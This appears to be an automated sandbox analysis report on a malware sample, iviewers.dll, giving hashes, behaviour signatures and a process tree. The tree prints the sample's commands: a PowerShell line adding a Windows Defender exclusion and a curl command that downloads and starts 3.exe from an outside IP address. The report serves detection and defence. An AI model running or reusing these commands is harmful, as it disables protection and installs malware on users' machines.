Analysis
-
max time kernel
7s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22/02/2025, 14:19
Static task
static1
Behavioral task
behavioral1
Sample
Launcher.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral2
Sample
iviewers.dll
Resource
win7-20241010-en
General
-
Target
iviewers.dll
-
Size
83KB
-
MD5
b273ffa32f2666ea4009ad513068fe88
-
SHA1
f5da4946574e72fa24587e005f9bf4974a37856d
-
SHA256
517963b561575a9592becf985ea32fa5a9c5accbcb4a70857ee5543c7b72e42f
-
SHA512
bc666ee4e658e0875e53b3157c07983660c5a2d0436f5cac57c1c704ccec0ea676700be28f00d7d623f922123ce1669ae868cefb35b67f1e181834e4cba9d794
-
SSDEEP
1536:cbo5eK+wzZQ1LRC7ivPv8ZqTfXeqvz+NBGQS18sWpcdVQHLHWeDCf7/P/:cs5tXVQLRC7iv4qTvcGQS1VQHjWeDCfb
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1716 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1716 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2148 wrote to memory of 2288 2148 regsvr32.exe 29 PID 2148 wrote to memory of 2288 2148 regsvr32.exe 29 PID 2148 wrote to memory of 2288 2148 regsvr32.exe 29 PID 2148 wrote to memory of 2288 2148 regsvr32.exe 29 PID 2148 wrote to memory of 2288 2148 regsvr32.exe 29 PID 2148 wrote to memory of 2288 2148 regsvr32.exe 29 PID 2148 wrote to memory of 2288 2148 regsvr32.exe 29 PID 2288 wrote to memory of 2144 2288 regsvr32.exe 30 PID 2288 wrote to memory of 2144 2288 regsvr32.exe 30 PID 2288 wrote to memory of 2144 2288 regsvr32.exe 30 PID 2288 wrote to memory of 2144 2288 regsvr32.exe 30 PID 2144 wrote to memory of 1716 2144 cmd.exe 32 PID 2144 wrote to memory of 1716 2144 cmd.exe 32 PID 2144 wrote to memory of 1716 2144 cmd.exe 32 PID 2144 wrote to memory of 1716 2144 cmd.exe 32 PID 2288 wrote to memory of 2888 2288 regsvr32.exe 33 PID 2288 wrote to memory of 2888 2288 regsvr32.exe 33 PID 2288 wrote to memory of 2888 2288 regsvr32.exe 33 PID 2288 wrote to memory of 2888 2288 regsvr32.exe 33
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\3.exe'"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\3.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 3.exe http://147.45.44.170/3.exe & start 3.exe3⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-